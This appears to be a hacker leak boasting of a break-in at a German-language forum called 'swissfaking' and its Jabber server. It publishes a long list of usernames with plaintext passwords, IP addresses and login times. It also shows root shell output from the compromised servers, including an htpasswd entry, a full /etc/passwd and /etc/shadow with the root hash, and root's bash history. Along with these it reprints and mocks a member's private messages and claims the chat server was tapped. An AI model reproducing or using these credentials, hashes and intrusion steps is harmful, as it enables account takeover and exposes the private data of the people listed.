+mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am +n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm 
+kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am +raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm +binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm +blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm +armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm +zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm +n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am +hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm +ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm +spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm +kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm +sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm +joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm +syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am +afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am +master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm +inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm +smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm +cch:anit77:93.232.245.48:January 6, 2011, 12:38 am +ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm +moses908:161286:178.142.75.51:January 3, 2011, 3:17 am +sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm +eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm +kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm +jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm +m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm +insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm +psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm +jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm +reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm +xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm +gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm +nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm 
+yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am +bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm +dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am +ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am +3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm +nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm +3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm +erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm +mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm +darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am +paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm +devil234:R/m<7ctN&AEr +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd board && ls -la +total 2416 +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 . +drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 .. +-rw-r--r-- 1 swissfaking swissfaking 238 Oct 24 13:33 .htaccess22foo +-rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:33 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 23823 Mar 26 2010 ajax.php +-rw-r--r-- 1 swissfaking swissfaking 75490 Mar 26 2010 album.php +-rw-r--r-- 1 swissfaking swissfaking 17119 Mar 26 2010 announcement.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 archive +-rw-r--r-- 1 swissfaking swissfaking 18288 Mar 26 2010 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 35093 Apr 14 2010 banned.jpg +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 17 21:25 banners +-rw-r--r-- 1 swissfaking swissfaking 75309 Mar 26 2010 calendar.php +-rw-r--r-- 1 swissfaking swissfaking 43 Mar 26 2010 clear.gif +drwxr-xr-x 5 swissfaking swissfaking 4096 Jan 2 16:30 clientscript +-rw-r--r-- 1 swissfaking swissfaking 15346 Mar 26 2010 converse.php +-rw-r--r-- 1 swissfaking swissfaking 555 Oct 24 13:33 cookie.html +drwxr-xr-x 8 swissfaking swissfaking 4096 May 7 2010 cpstyles +-rw-r--r-- 1 swissfaking swissfaking 49309 May 19 2010 credits.php +-rw-r--r-- 1 swissfaking 
swissfaking 3299 Mar 26 2010 cron.php +drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customavatars +drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customgroupicons +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 customprofilepics +-rw-r--r-- 1 swissfaking swissfaking 47736 Mar 26 2010 editpost.php +-rw-r--r-- 1 swissfaking swissfaking 29479 Mar 26 2010 external.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 4 22:35 falloutadm +-rw-r--r-- 1 swissfaking swissfaking 9765 Mar 26 2010 faq2.phpoldold +-rw-r--r-- 1 swissfaking swissfaking 4286 Mar 26 2010 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 35640 Mar 26 2010 forumdisplay.php +-rw-r--r-- 1 swissfaking swissfaking 39820 Mar 26 2010 global.php +-rw-r--r-- 1 swissfaking swissfaking 137864 Mar 26 2010 group.php +-rw-r--r-- 1 swissfaking swissfaking 24898 Mar 26 2010 group_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 10816 Mar 26 2010 groupsubscription.php +-rw-r--r-- 1 swissfaking swissfaking 9026 Mar 26 2010 image.php +drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 31 22:09 images +drwxr-xr-x 2 swissfaking swissfaking 4096 Apr 9 2010 img +drwxr-xr-x 7 swissfaking swissfaking 12288 Jan 2 22:12 includes +-rw-r--r-- 1 swissfaking swissfaking 19575 Nov 27 04:26 index.php +drwxr-xr-x 6 swissfaking swissfaking 4096 Mar 26 2010 infernoshout +-rw-r--r-- 1 swissfaking swissfaking 11083 Mar 26 2010 infernoshout.php +-rw-r--r-- 1 swissfaking swissfaking 43808 Mar 26 2010 infraction.php +-rw-r--r-- 1 swissfaking swissfaking 182738 Mar 26 2010 inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 5850 Mar 26 2010 itrader.php +-rw-r--r-- 1 swissfaking swissfaking 11784 Mar 26 2010 itrader_detail.php +-rw-r--r-- 1 swissfaking swissfaking 11841 Mar 26 2010 itrader_feedback.php +-rw-r--r-- 1 swissfaking swissfaking 1401 Mar 26 2010 itrader_global.php +-rw-r--r-- 1 swissfaking swissfaking 19557 Mar 26 2010 itrader_main.php +-rw-r--r-- 1 swissfaking swissfaking 3570 Mar 26 2010 itrader_report.php 
+drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 jabber +-rw-r--r-- 1 swissfaking swissfaking 10321 Mar 26 2010 joinrequests.php +-rw-r--r-- 1 swissfaking swissfaking 10201 Mar 26 2010 login.php +-rw-r--r-- 1 swissfaking swissfaking 17048 Mar 26 2010 member.php +-rw-r--r-- 1 swissfaking swissfaking 15910 Mar 26 2010 member_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 35880 Mar 26 2010 memberlist.php +-rw-r--r-- 1 swissfaking swissfaking 23846 Mar 26 2010 misc.php +-rw-r--r-- 1 swissfaking swissfaking 63310 Mar 26 2010 moderation.php +-rw-r--r-- 1 swissfaking swissfaking 6735 Mar 26 2010 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 18456 Mar 26 2010 newattachment.php +-rw-r--r-- 1 swissfaking swissfaking 37083 Mar 26 2010 newreply.php +-rw-r--r-- 1 swissfaking swissfaking 18890 Mar 26 2010 newthread.php +-rw-r--r-- 1 swissfaking swissfaking 19583 Mar 26 2010 online.php +-rw-r--r-- 1 swissfaking swissfaking 7675 Mar 26 2010 payment_gateway.php +-rw-r--r-- 1 swissfaking swissfaking 11889 Mar 26 2010 payments.php +-rw-r--r-- 1 swissfaking swissfaking 7868 Mar 26 2010 picture.php +-rw-r--r-- 1 swissfaking swissfaking 22022 Mar 26 2010 picture_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 25293 Mar 26 2010 picturecomment.php +drwxr-xr-x 2 swissfaking swissfaking 4096 May 19 2010 plugins +-rw-r--r-- 1 swissfaking swissfaking 27394 Mar 26 2010 poll.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 polls +-rw-r--r-- 1 swissfaking swissfaking 9491 Mar 26 2010 posthistory.php +-rw-r--r-- 1 swissfaking swissfaking 75622 Jul 17 20:16 postings.php +-rw-r--r-- 1 swissfaking swissfaking 6573 Mar 26 2010 printthread.php +-rw-r--r-- 1 swissfaking swissfaking 70727 Mar 26 2010 private.php +-rw-r--r-- 1 swissfaking swissfaking 152315 Mar 26 2010 profile.php +-rw-r--r-- 1 swissfaking swissfaking 555 Mar 26 2010 quickpreview.php +-rw-r--r-- 1 swissfaking swissfaking 39730 Mar 26 2010 register.php +-rw-r--r-- 1 swissfaking swissfaking 5667 Mar 26 2010 
report.php +-rw-r--r-- 1 swissfaking swissfaking 13699 Mar 26 2010 reputation.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 30 01:07 runnerzzzmod +-rw-r--r-- 1 swissfaking swissfaking 128640 May 6 2010 search.php +-rw-r--r-- 1 swissfaking swissfaking 20673 Mar 26 2010 sendmessage.php +-rw-r--r-- 1 swissfaking swissfaking 9988 Mar 26 2010 showgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11353 Mar 26 2010 showpost.php +-rw-r--r-- 1 swissfaking swissfaking 73449 Mar 26 2010 showthread.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 signaturepics +-rw-r--r-- 1 swissfaking swissfaking 47803 Mar 26 2010 statistics__blocked_.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 statsmod___blocked_ +-rw-r--r-- 1 swissfaking swissfaking 32827 Mar 26 2010 subscription.php +-rw-r--r-- 1 swissfaking swissfaking 2091 Mar 26 2010 swisss.php +-rw-r--r-- 1 swissfaking swissfaking 13344 Mar 26 2010 tags.php +-rw-r--r-- 1 swissfaking swissfaking 8671 Mar 26 2010 threadrate.php +-rw-r--r-- 1 swissfaking swissfaking 12394 Mar 26 2010 threadtag.php +-rw-r--r-- 1 swissfaking swissfaking 34494 Mar 26 2010 usercp.php +-rw-r--r-- 1 swissfaking swissfaking 19077 Mar 26 2010 usernote.php +-rw-r--r-- 1 swissfaking swissfaking 27339 Mar 26 2010 visitormessage.php +drwxr-xr-x 5 swissfaking swissfaking 4096 Mar 26 2010 vmoods +drwxr-xr-x 13 swissfaking swissfaking 4096 Mar 26 2010 zseries_red +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 zxpwmvprzzugrzms + +# cat includes/config.php + +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd zxpwmvprzzugrzms && ls -la +total 2068 +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. 
+-rw-r--r-- 1 swissfaking swissfaking 495 Jan 3 22:38 .htaccess +-rw-r--r-- 1 swissfaking swissfaking 26 Jan 3 22:38 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 19317 Jan 3 22:52 accessmask.php +-rw-r--r-- 1 swissfaking swissfaking 39558 Jan 3 22:52 admincalendar.php +-rw-r--r-- 1 swissfaking swissfaking 49620 Jan 3 22:52 admininfraction.php +-rw-r--r-- 1 swissfaking swissfaking 19126 Jan 3 22:52 adminlog.php +-rw-r--r-- 1 swissfaking swissfaking 8125 Jan 3 22:52 adminpermissions.php +-rw-r--r-- 1 swissfaking swissfaking 25492 Jan 3 22:52 adminreputation.php +-rw-r--r-- 1 swissfaking swissfaking 32824 Jan 3 22:52 album.php +-rw-r--r-- 1 swissfaking swissfaking 12980 Jan 3 22:52 announcement.php +-rw-r--r-- 1 swissfaking swissfaking 54994 Jan 3 22:52 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 12488 Jan 3 22:52 attachmentpermission.php +-rw-r--r-- 1 swissfaking swissfaking 19331 Jan 3 22:52 avatar.php +-rw-r--r-- 1 swissfaking swissfaking 16437 Jan 3 22:52 bbcode.php +-rw-r--r-- 1 swissfaking swissfaking 14758 Jan 3 22:51 bookmarksite.php +-rw-r--r-- 1 swissfaking swissfaking 12059 Jan 3 22:51 calendarpermission.php +-rw-r--r-- 1 swissfaking swissfaking 43 Jan 3 22:51 clear.gif +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 3 22:53 control_examples +-rw-r--r-- 1 swissfaking swissfaking 65076 Jan 3 22:51 credits_admin.php +-rw-r--r-- 1 swissfaking swissfaking 24025 Jan 3 22:51 cronadmin.php +-rw-r--r-- 1 swissfaking swissfaking 10710 Jan 3 22:51 cronlog.php +-rw-r--r-- 1 swissfaking swissfaking 34063 Jan 3 22:51 css.php +-rw-r--r-- 1 swissfaking swissfaking 21795 Jan 3 22:51 diagnostic.php +-rw-r--r-- 1 swissfaking swissfaking 11724 Jan 3 22:51 email.php +-rw-r--r-- 1 swissfaking swissfaking 17458 Jan 3 22:51 faq.php +-rw-r--r-- 1 swissfaking swissfaking 12143 Jan 3 22:51 force_read_thread.php +-rw-r--r-- 1 swissfaking swissfaking 30113 Jan 3 22:51 forum.php +-rw-r--r-- 1 swissfaking swissfaking 30039 Jan 3 22:51 forumpermission.php +-rw-r--r-- 1 
swissfaking swissfaking 7692 Jan 3 22:51 global.php +-rw-r--r-- 1 swissfaking swissfaking 25898 Jan 3 22:51 help.php +-rw-r--r-- 1 swissfaking swissfaking 51895 Jan 3 22:51 image.php +-rw-r--r-- 1 swissfaking swissfaking 45450 Jan 3 22:51 index.php +-rw-r--r-- 1 swissfaking swissfaking 8756 Jan 3 22:51 infernoshoutlog.php +-rw-r--r-- 1 swissfaking swissfaking 3251 Jan 3 22:50 itrader_misc.php +-rw-r--r-- 1 swissfaking swissfaking 37384 Jan 3 22:50 language.php +-rw-r--r-- 1 swissfaking swissfaking 51623 Jan 3 22:50 mgc_cb_evo.php +-rw-r--r-- 1 swissfaking swissfaking 69534 Jan 3 22:50 misc.php +-rw-r--r-- 1 swissfaking swissfaking 34140 Jan 3 22:50 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 16889 Jan 3 22:50 modlog.php +-rw-r--r-- 1 swissfaking swissfaking 1837 Jan 3 22:50 newsproxy.php +-rw-r--r-- 1 swissfaking swissfaking 30631 Jan 3 22:50 notice.php +-rw-r--r-- 1 swissfaking swissfaking 43202 Jan 3 22:50 options.php +-rw-r--r-- 1 swissfaking swissfaking 12026 Jan 3 22:50 passwordcheck.php +-rw-r--r-- 1 swissfaking swissfaking 62644 Jan 3 22:50 phrase.php +-rw-r--r-- 1 swissfaking swissfaking 85854 Jan 3 22:50 plugin.php +-rw-r--r-- 1 swissfaking swissfaking 33055 Jan 3 22:50 prefix.php +-rw-r--r-- 1 swissfaking swissfaking 49757 Jan 3 22:50 profilefield.php +-rw-r--r-- 1 swissfaking swissfaking 11300 Jan 3 22:49 ranks.php +-rw-r--r-- 1 swissfaking swissfaking 5696 Jan 3 22:49 read_pms_deu.php +-rw-r--r-- 1 swissfaking swissfaking 15668 Jan 3 22:49 replacement.php +-rw-r--r-- 1 swissfaking swissfaking 11004 Jan 3 22:49 resources.php +-rw-r--r-- 1 swissfaking swissfaking 30488 Jan 3 22:49 ripper.php +-rw-r--r-- 1 swissfaking swissfaking 20657 Jan 3 22:49 rssposter.php +-rw-r--r-- 1 swissfaking swissfaking 13164 Jan 3 22:49 socialgroup_icon.php +-rw-r--r-- 1 swissfaking swissfaking 17538 Jan 3 22:49 socialgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11215 Jan 3 22:49 stamp.php +-rw-r--r-- 1 swissfaking swissfaking 8623 Jan 3 22:49 stats.php +-rw-r--r-- 
1 swissfaking swissfaking 8170 Jan 3 22:49 subscriptionpermission.php +-rw-r--r-- 1 swissfaking swissfaking 62261 Jan 3 22:49 subscriptions.php +-rw-r--r-- 1 swissfaking swissfaking 91677 Jan 3 22:49 template.php +-rw-r--r-- 1 swissfaking swissfaking 3911 Jan 3 22:49 textarea.php +-rw-r--r-- 1 swissfaking swissfaking 58666 Jan 3 22:49 thread.php +-rw-r--r-- 1 swissfaking swissfaking 8300 Jan 3 22:49 threadfields_admin.php +-rw-r--r-- 1 swissfaking swissfaking 95176 Jan 3 22:48 user.php +-rw-r--r-- 1 swissfaking swissfaking 56136 Jan 3 22:48 usergroup.php +-rw-r--r-- 1 swissfaking swissfaking 7272 Jan 3 22:48 usertitle.php +-rw-r--r-- 1 swissfaking swissfaking 75581 Jan 3 22:48 usertools.php +-rw-r--r-- 1 swissfaking swissfaking 18753 Jan 3 22:48 verify.php + +# cat .htpasswd +Fickmaus:9Zistd9IicJdY + +# cd ../jabber && ls -la +total 684 +drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. +-rw-r--r-- 1 swissfaking swissfaking 7948 Oct 10 18:54 AC_OETags.js +-rw-r--r-- 1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf +-rw-r--r-- 1 swissfaking swissfaking 4286 Oct 10 19:10 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 3638 Oct 10 18:54 favicon.ico +-rw-r--r-- 1 swissfaking swissfaking 1272 Oct 10 18:54 history.htm +-rw-r--r-- 1 swissfaking swissfaking 1292 Oct 10 18:54 history.js +-rw-r--r-- 1 swissfaking swissfaking 2656 Oct 10 18:54 history.swf +-rw-r--r-- 1 swissfaking swissfaking 15260 Oct 10 19:11 jabber.html +-rw-r--r-- 1 swissfaking swissfaking 2518 Oct 10 18:55 osxmousewheel.js +-rw-r--r-- 1 swissfaking swissfaking 657 Oct 10 18:55 playerProductInstall.swf + + +While looking through the forums we came across someone special... +________________________________________________________________________ +From fred777 to Fickmaus; Subject: Mod? + +Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen +ob ihr Unterstützung benötigt, bzw. 
ich würde gerne meine Hilfe anbieten.. + +Designen, moderieren etc. +Als Moderator würde ich wenn dann gerne die Sections: +Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch +gar keine, ich dachte nur für einen guten Start ist das nicht schlecht. + +Selbstverständlich werde ich auch noch einiges posten + +Falls ihr mich nicht kennt, schaut mal auf +fred777.5x.to, free-hack, back2hack etc. vorbei ;) + +Danke +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Hi Crasher + +Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich +der Hacking/Coding Section. +Ich würde die gerne moderieren und euch helfen. +Das ich kein Mist mache solltest du wissen, bin schon lange im Netz +unterwegs, FH,Back2hack etc.. + +Solltest du Fragen haben: ICQ 390271540 + +Vielleicht wird das ja was, danke schonmal +________________________________________________________________________ +From fred777 to erdnuss; Subject: Mod? + +Ja, da nun ja auch Sections geändert worden sind und es voller wird, +wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren +in der Security/Hacking Sections. +Habe auch schon letztens Ficki gefragt, der meinte abwarten... + +Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde +gerne Moderator in dieser Section werden, darum die Frage. +Kennen könnte man mich von Back2hack und Freehack ;) +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Frage + +Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht, +Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine +komplette Bewerbung abschicken wenn ihr welche sucht. 
+________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Aussichten + +Ja ich wollte mal fragen, wie es so steht, bezüglich der +Moderatorenanfrage und was die anderem Teamies gesagt haben.. + +Gruß _fred_ +________________________________________________________________________ + + +FUCK. Are you serious? We knew you're lame. We knew you're dying for +fame and we even knew you suck cock but we were absolutely not aware +of the extent this has come to. Are you really that desperate to +moderate a fucking preschool that you start begging for it only days +after your registration? Damnit fred, you're pretty rundown. + + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| From fred777 to Fickmaus; Subject: Jabber | +| Ja ich hätte gerne einen Account, habe noch keinen. | +| Name: fred777 | +|____________________________________________________________________| + +Right on cue, chap! +Not only is the board full of criminal kids, but they also provide a +jabber server for their users. While at it, we decided to tap in and +see what they're doing there, we also got some loggin going and +prepared a nice collection of their messages as well as a full backup +for you. 
+ + +# uname -a +Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +jabber:x:107:65534::/var/run/jabber:/bin/false +messagebus:x:108:109::/var/run/dbus:/bin/false +avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false +postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +identd:x:111:65534::/var/run/identd:/bin/false +openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false +root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7::: +daemon:*:14725:0:99999:7::: +bin:*:14725:0:99999:7::: +sys:*:14725:0:99999:7::: +sync:*:14725:0:99999:7::: +games:*:14725:0:99999:7::: +man:*:14725:0:99999:7::: +lp:*:14725:0:99999:7::: +mail:*:14725:0:99999:7::: +news:*:14725:0:99999:7::: +uucp:*:14725:0:99999:7::: 
+proxy:*:14725:0:99999:7::: +www-data:*:14725:0:99999:7::: +backup:*:14725:0:99999:7::: +list:*:14725:0:99999:7::: +irc:*:14725:0:99999:7::: +gnats:*:14725:0:99999:7::: +nobody:*:14725:0:99999:7::: +libuuid:!:14725:0:99999:7::: +bind:*:14725:0:99999:7::: +fetchmail:*:14725:0:99999:7::: +sshd:*:14725:0:99999:7::: +stunnel4:!:14725:0:99999:7::: +smmta:*:14725:0:99999:7::: +smmsp:*:14725:0:99999:7::: +jabber:*:14817:0:99999:7::: +messagebus:*:14829:0:99999:7::: +avahi:*:14829:0:99999:7::: +postgres:*:14829:0:99999:7::: +identd:*:14829:0:99999:7::: +openfire:*:14829:0:99999:7::: + +# cd /root && ls -la +total 36 +drwxr-xr-x 3 root root 4096 Jan 3 01:45 . +drwxr-xr-x 20 root root 4096 Dec 30 13:30 .. +-rw------- 1 root root 5215 Sep 27 21:42 .bash_history +-rw-r--r-- 1 root root 412 Dec 16 2004 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +drwx------ 2 root root 4096 Jan 3 00:35 .ssh +-rw------- 1 root root 6186 Jan 3 01:45 .viminfo + +# cat .bash_history +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +ls -l +vi jabber.cfg +cd .. +ls -l +cd .. +ls -l +cd jabberd/jabber-1.4.2a +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +ls -l +cd .. +ls -l +cd etc +cd jabber +ls -l +Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +ls -l +gzip -d mu-conference-0.6.0.tar.gz +ls -l +tar -xvf mu-conference-0.6.0.tar +ls -l +cd mu-conference-0.6.0 +ls -l +make +Makefile +ls -l +ps aux +cd src +ls -l +cd .. +ls -l +cd scripts +ls -l +cd .. +ls -l +cd ./ +ls -l +cd .. +ls -l +vi jabber.xml +cd mu-conference-0.6.0 +ls -l +make +cd src +ls -l +make +cd .. +cd .. +cd .. +cd .. 
+ls -l +cd /etc/jabber +ls -l +del mu-conference-0.6.0.tar +rmdir mu-conference-0.6.0 + mu-conference-0.6.0 +rmdir -p mu-conference-0.6.0 +rmdir --ignore-fail-on-non-empty mu-conference-0.6.0 +ls -l +rmdir --help +rmdir --ignore mu-conference-0.6.0 +ls -l +rmdir -i mu-conference-0.6.0 +rm mu-conference-0.6.0.tar +ls -l +rm mu-conference-0.6.0 +rm -r mu-conference-0.6.0 +ls -l +cd .. +cd .. +cd .. +ls -l +wget http://download.gna.org/mu-conference/mu-conference_0.8.tar.gz +ls -l +gzip -d mu-conference_0.8.tar.gz +ls -l +tar -xvf mu-conference_0.8.tar +ls -l +cd mu-conference_0.8 +ls -l +make +ls -l +cd scr +ls -l +cd src +ls -l +make +ls -l +cd .. +cd .. +ls -l +rm mu-conference_0.8.tar +rm -r mu-conference_0.8 +ls -l +wget http://download.jabberd.org/jabberd14/jabberd-1.4.4.tar.gz +gzip -d jabberd-1.4.4.tar.gz +tar -xvf gzip -d jabberd-1.4.4.tar +ls -l +tar -xvf jabberd-1.4.4.tar +ls -l +cd jabberd-1.4.4 +ls -l +./configure +make +ls -l +cd .. +ls -l +rm jabberd-1.4.4.tar +rm -r jabberd-1.4.4 +ls -l +cd etc +cd jabber +ls -l +vi jabber.d +cd jabber.d +ls -l +cd .. +cd .. +cd .. +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +wget http://ftp.riken.go.jp/pub/FreeBSD/distfiles/jabber/jud-0.4.tar.gz +ls -l +gzip -d jud-0.4.tar.gz +tar -xvf jud-0.4.tar +ls -l +cd jud-0.4 +ls -l +make +cd .. +ls -l +rm jud-0.4.tar +rm -r jud-0.4 +ls -l +ls -l +cd .. +ls -l +cd var +cd run +cd jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd .. +ls -l +cd etc +ls -l +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +cd .. +cd var +cd run +cd jabber +ls -l + su jabber +ls -l +ps aux +cd .. +cd .. +ls -l +cd etc +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber.xml +cd .. +ls -l +cd jabber +ls -l +cd .. +cd init.d +ls -l +cd jabber +cd .. +ls -l +cd .. +cd usr +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd.. +cd .. +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber-muc.xml +jabber-muc +cd .. 
+ls -l +cd default +ls -l +jabber-muc +cd jabber-muc +jabber-muc +cd jabber-muc +exec jabber-muc +cd .. +cd .. +cd var +cd spool +ls -l +cd .. +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +ps aux +cd .. +ls -l +cd etc +cd jabber +ls -l +vi jabber-muc.xml +vi jabber-jud.xml +vi jabber.xml +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +ps aux +cd .. +cd .. +cd usr +ls -l +cd lib +ls -l +cd jabber +ls -l +cd mu-conference +ls -l +cd .. +cd .. +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi +vi jabber.xml +ps aux +kill 26124 +ls -l +ps aux +cd .. +cd .. +cd usr +cd sbin +ls -l +jabberd -h jabber-swissfaking.net +cd .. +cd .. +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +cd .. +cd .. +cd usr +cd sbin +jabberd -h jabber-swissfaking.net +ps aux +netstat -tlun +cd .. +cd cd var +ls -l +cd var +cd run +cd jabber +ls -l +cd .. +cd .. +ls -l +cd .. +ls -l +cd usr +cd sbin +ls -l +jabber-muc +jabberd -much jabber-swissfaking.net +cd .. +cd etc +cd jabber +ls -l +vi jabber.xml +vi jabber.cfg +cd.. +cd .. +cd .. +cd var +cd lib +cd jabber +ls -l +cd .. +cd .. +cd var +cd var +cd .. +cd var +cd run +cd jabber +ls -l 